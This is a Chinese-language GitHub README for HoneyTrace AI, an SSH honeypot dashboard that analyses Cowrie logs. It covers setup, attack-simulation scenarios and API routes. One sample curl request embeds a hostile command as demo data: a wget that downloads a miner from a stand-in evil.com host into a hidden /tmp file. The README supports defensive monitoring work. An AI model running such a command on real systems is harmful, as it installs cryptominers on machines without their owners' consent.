shahulgithub1/honeytrace-ai
GitHub: shahulgithub1/honeytrace-ai
一个集成 AI 分析能力的 SSH 蜜罐威胁监控仪表盘,将 Cowrie 日志转化为可视化攻击行为分析与全球威胁情报展示。
Stars: 0 | Forks: 0
# HoneyTrace AI — SSH 威胁监控器
一个专业的蜜罐分析仪表盘,精确展示黑客发起攻击瞬间的所作所为。
## 快速开始
```
unzip honeytrace-ai.zip
cd honeytrace-ai
node server.js
```
打开 **http://127.0.0.1:3000**
如果 3000 端口被占用:
```
PORT=3001 node server.js
```
## 从终端发起攻击
完整攻击模拟:
```
node scripts/attack-simulator.js --scenario full
```
特定场景:
```
node scripts/attack-simulator.js --scenario bruteforce --country China --ip 121.18.238.12
node scripts/attack-simulator.js --scenario crypto --country Netherlands
node scripts/attack-simulator.js --scenario recon --country Germany
node scripts/attack-simulator.js --scenario dropper --country Russia
```
通过 curl 发送单个 Cowrie 事件:
```
curl -X POST http://127.0.0.1:3000/api/import/cowrie \
-H "Content-Type: application/json" \
-d '{"eventid":"cowrie.command.input","src_ip":"1.2.3.4","username":"root","input":"wget http://evil.com/miner -O /tmp/.x"}'
```
## 功能
| 标签页 | 显示内容 |
|---|---|
| 概览 | 统计数据、时间轴、顶级攻击者、顶级 MITRE 技术 |
| 实时动态 | SOC 风格的实时事件流 |
| 世界地图 | 可点击的地图 —— 点击任意国家获取通俗易懂的攻击摘要 |
| 告警 | 事件分诊,带有确认按钮及已确认历史记录 |
| 攻击者 | 带有可点击卡片的排行榜 —— 配置文件、会话重放、命令分析 |
| 杀伤链 | 攻击中观察到的 ATT&CK 阶段 |
| MITRE ATT&CK | 柱状图 + 热力图 + 战术矩阵 |
| IOC | 提取的 URL、IP、域名、文件路径 |
| 已拦截 IP | 拦截/解除拦截攻击者(重启后依然保留) |
| 事件 | 原始事件表 |
| 导入 | 粘贴 Cowrie JSONL 或使用终端模拟器 |
## 脚本
```
node server.js # start server
node scripts/test.js # run 9 tests
node scripts/export-report.js # save Markdown report
node scripts/attack-simulator.js # simulate attacks from terminal
```
## API
| 方法 | 路由 | 描述 |
|---|---|---|
| GET | /api/summary | 仪表盘指标 |
| GET | /api/attackers | 所有配置文件 |
| GET | /api/attackers/:ip | 单个配置文件 |
| GET | /api/attackers/:ip/analysis | AI 分析 |
| GET | /api/attackers/:ip/session | 会话重放 |
| GET | /api/alerts | 告警分诊 |
| GET | /api/iocs | 提取的 IOC |
| GET | /api/geo | 地理位置攻击数据 |
| GET | /api/killchain | 杀伤链 |
| GET | /api/livefeed | 实时事件流 |
| GET | /api/blocked | 已拦截的 IP |
| GET | /api/report | Markdown 报告 |
| GET | /api/export/csv | 下载 CSV |
| POST | /api/simulate | 添加演示事件 |
| POST | /api/import/cowrie | 导入 JSONL |
| POST | /api/reset | 恢复种子数据 |
| POST | /api/block/:ip | 拦截 IP |
| DELETE | /api/block/:ip | 解除拦截 IP |
| PATCH | /api/alerts/:id/ack | 确认告警 |
标签:GNU通用公共许可证, HTTP/HTTPS抓包, MITM代理, Node.js, 威胁情报, 密码管理, 开发者工具, 态势感知, 数据可视化, 网络安全, 自定义脚本, 蜜罐, 证书利用, 隐私保护